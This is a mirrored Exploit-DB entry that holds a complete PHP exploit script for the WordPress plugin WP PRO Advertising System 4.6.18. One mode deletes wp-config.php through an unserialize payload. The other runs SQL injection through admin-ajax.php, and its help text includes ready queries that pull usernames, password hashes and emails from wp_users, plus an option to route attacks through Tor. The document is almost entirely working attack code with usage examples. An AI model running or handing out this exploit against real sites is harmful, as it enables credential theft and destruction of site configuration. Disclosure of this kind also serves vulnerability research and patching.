WordPress Plugin WP PRO Advertising System 4.6.18 – SQL Injection

• Exploit Database
• 19 阅读

• 作者： wp0Day.com
  日期： 2016-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39893/

• <?php
  /**
   * Exploit Titie: WP PRO Advertising System - All In One Ad ManagerExploit
   * Google Dork:
   * Exploit Author: wp0Day.com <contact@wp0day.com>
   * Vendor Homepage: http://wordpress-advertising.com/
   * Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
   * Version: 4.6.18
   * Tested on: Debian 8, PHP 5.6.17-3
   * Type: SQLi, Unserialize, File Delete.
   * Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936]
   */
  
  
  require_once('curl.php');
  //OR
  //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
  $curl = new CurlWrapper();
  
  
  $options = getopt("t:m:f:c:u:p:s:",array('tor:'));
  print_r($options);
  $options = validateInput($options);
  
  if (!$options){
  showHelp();
  }
  
  if ($options['tor'] === true)
  {
  echo " ### USING TOR ###\n";
  echo "Setting TOR Proxy...\n";
  $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
  $curl->addOption(CURLOPT_PROXYTYPE,7);
  echo "Checking IPv4 Address\n";
  $curl->get('https://dynamicdns.park-your-domain.com/getip');
  echo "Got IP : ".$curl->getResponse()."\n";
  echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
  $answer = fgets(fopen ("php://stdin","r"));
  if(trim($answer) != 'wololo'){
  die("Aborting!\n");
  }
  echo "OK...\n";
  }
  
  class CPDF_Adapter{
  
  
  private$_image_cache;
  public function set_file($file){
  $this->_image_cache = array($file);
  }
  }
  
  
  
  function logIn(){
  global $curl, $options;
  file_put_contents('cookies.txt',"\n");
  $curl->setCookieFile('cookies.txt');
  $curl->get($options['t']);
  $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
  $curl->post($options['t'].'/wp-login.php', $data);
  $status =$curl->getTransferInfo('http_code');
  if ($status !== 302){
  echo "Login probably failed, aborting...\n";
  echo "Login response saved to login.html.\n";
  die();
  }
  file_put_contents('login.html',$curl->getResponse());
  
  
  }
  
  
  
  function exploit(){
  global $curl, $options;
  
  if ($options['m'] == 'd'){
  echo "Delete mode\n";
  $pay_load_obj = new CPDF_Adapter();
  $pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' );
  $pay_load = base64_encode(serialize(array($pay_load_obj)));
  $data = array('stats_pdf'=>'1', 'data'=>$pay_load);
  $curl->post($options['t'].'?'.http_build_query($data));
  $resp = $curl->getResponse();
  echo $resp;
  } else {
  echo "SQLi mode \n";
  echo "Trying a longin...\n";
  logIn();
  echo "Running SQL in Inject mode: ".$options['s']."\n";
  $pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1);
  $curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load);
  $resp = $curl->getResponse();
  //Grab the output
  if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){
   if (isset($mat[1])){
   echo "Response:\n".$mat[1]."\n";
   die("Done\n");
   }
  }
  echo "Failed getting SQLi response, response saved to resp.html\n";
  file_put_contents('resp.html', $resp);
  
  }
  
  
  
  
  }
  
  
  
  exploit();
  
  
  
  function validateInput($options){
  
  if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
  return false;
  }
  
  if (!preg_match('~/$~',$options['t'])){
  $options['t'] = $options['t'].'/';
  }
  if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){
  return false;
  }
  if ($options['m'] == 's' && (!isset($options['u'])|| !isset($options['p']) || !isset($options['s'])) ){
  return false;
  }
  $options['tor'] = isset($options['tor']);
  
  return $options;
  }
  
  
  function showHelp(){
  global $argv;
  $help = <<<EOD
  
  WP PRO Advertising System - All In One Ad Manager Expoit Pack
  
  Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE]-s [SQL]
  
   *** In order to use the SQLi part you need an advertiser login **
  
   [TARGET_URL] http://localhost/wordpress/
   [MODE] d - Delete wp-config.php
  s - SQL Injection
   [TOR] Use tor network? (Connects to 127.0.0.1:9150)
  
   Note: In SQLi mode, you can't use ' or ", and you are in a subselect.
   To get all users and passwords you would do :
   SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)FROM wp_users LIMIT 1
   SELECT concat(user_login,0x3a,user_pass)FROM wp_users LIMIT 1,1
   SELECT concat(user_login,0x3a,user_pass)FROM wp_users LIMIT 2,1
  
  
  Examples:
   php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files
   php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)FROM wp_users LIMIT 1'
  
  Misc:
   CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
   @link http://github.com/svyatov/CurlWrapper
   @license http://www.opensource.org/licenses/mit-license.html MIT License
  
  EOD;
  echo $help."\n\n";
  die();
  }